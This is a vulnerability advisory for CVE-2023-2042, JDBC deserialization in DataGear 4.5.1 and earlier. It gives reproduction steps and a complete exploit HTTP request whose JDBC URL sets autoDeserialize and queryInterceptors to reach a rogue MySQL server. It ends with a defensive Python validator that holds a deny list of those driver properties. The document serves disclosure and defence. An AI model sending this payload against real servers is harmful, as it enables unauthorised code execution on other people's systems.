CVE-2023-2042: ForCVE/2023-0x06.md at main · yangyanglo/ForCVE
A vulnerability, which was classified as problematic, has been found in DataGear up to 4.5.1. Affected by this issue is some unknown functionality of the component JDBC Server Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225920. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Description: DataGear is a free, open source data visualization and analysis platform that lets you build any data dashboard you want and supports access to various data sources such as SQL, CSV, Excel, HTTP interfaces, and JSON. In DataGear 4.5.1 and earlier, an attacker can achieve a JDBC deserialization attack by uploading a vulnerable version of the MySQL driver. After the upload succeeds, an unauthenticated attacker can construct a malicious request that connects to a malicious JDBC server to trigger deserialization.
Version: datagear <= 4.5.1
Address: https://github.com/datageartech/datagear
Vulnerability reproduction:
1. Log in to the system and upload a MySQL driver version that has the JDBC deserialization vulnerability.
2. Generate URLDNS deserialization data.
3. Set up a mysql_fake server.
4. Find the data source, select the driver we added, and fill in the payload that triggers the vulnerability (removing cookies can also trigger the vulnerability).
```http
POST /schema/testConnection HTTP/1.1
Host: localhost:50401
Content-Length: 639
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:50401
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:50401/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"id":"33141aada1873c584331","title":"test","url":"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","user":"root","password":"root","createUser":{"id":"admin","name":"admin","realName":"","email":"","admin":true,"anonymous":false,"createTime":"2023-04-01 18:15:08","nameLabel":"admin"},"createTime":"2023-04-01 18:23:50","driverEntity":{"id":"116f66f1e1873c530001","driverClassName":"com.mysql.cj.jdbc.Driver","displayName":"mysql-connector-java-8.0.12","displayText":"mysql-connector-java-8.0.12","displayDescMore":""},"properties":[],"dataPermission":99}
```
5. Connecting to the malicious JDBC server triggers the deserialization.
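A server-side check a defender could apply to the `url` field of a `/schema/testConnection` body before any connection is attempted: it rejects the Connector/J properties that appear in the request above (plus the related interceptor properties of the same driver) and any host outside an allowlist. This is an added example, not DataGear's own code; the allowlist, the trimmed sample bodies and the function names are assumptions.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Connector/J properties that can turn a connection into a deserialization sink.
# autoDeserialize and queryInterceptors appear in the reported payload; the
# other two are sibling interceptor properties of the same driver family.
DANGEROUS_PARAMS = {
    "autodeserialize",
    "queryinterceptors",
    "statementinterceptors",
    "exceptioninterceptors",
}

def check_jdbc_url(url: str, allowed_hosts: set[str]) -> list[str]:
    """Return a list of findings; an empty list means the URL passed."""
    findings = []
    if not url.lower().startswith("jdbc:"):
        return ["not a jdbc url"]
    # Strip the "jdbc:" prefix so urlsplit sees "mysql://host:port/db?params".
    parts = urlsplit(url[len("jdbc:"):])
    host = parts.hostname or ""
    if host not in allowed_hosts:
        findings.append(f"host not in allowlist: {host!r}")
    # Property names are matched case-insensitively so mixed case cannot bypass the check.
    for name in parse_qs(parts.query, keep_blank_values=True):
        if name.lower() in DANGEROUS_PARAMS:
            findings.append(f"dangerous driver property: {name}")
    return findings

def check_test_connection_body(body: str, allowed_hosts: set[str]) -> list[str]:
    """Apply check_jdbc_url to the JSON body of a data-source test request."""
    data = json.loads(body)
    return check_jdbc_url(data.get("url", ""), allowed_hosts)

# Constructed sample bodies (trimmed to the fields the check needs).
MALICIOUS_BODY = json.dumps({
    "title": "test",
    "url": "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true"
           "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
})
BENIGN_BODY = json.dumps({
    "title": "prod",
    "url": "jdbc:mysql://db.internal.example:3306/reports?useSSL=true",
})

if __name__ == "__main__":
    allow = {"db.internal.example"}  # assumed allowlist of approved database hosts
    print(check_test_connection_body(MALICIOUS_BODY, allow))  # three findings
    print(check_test_connection_body(BENIGN_BODY, allow))     # []
```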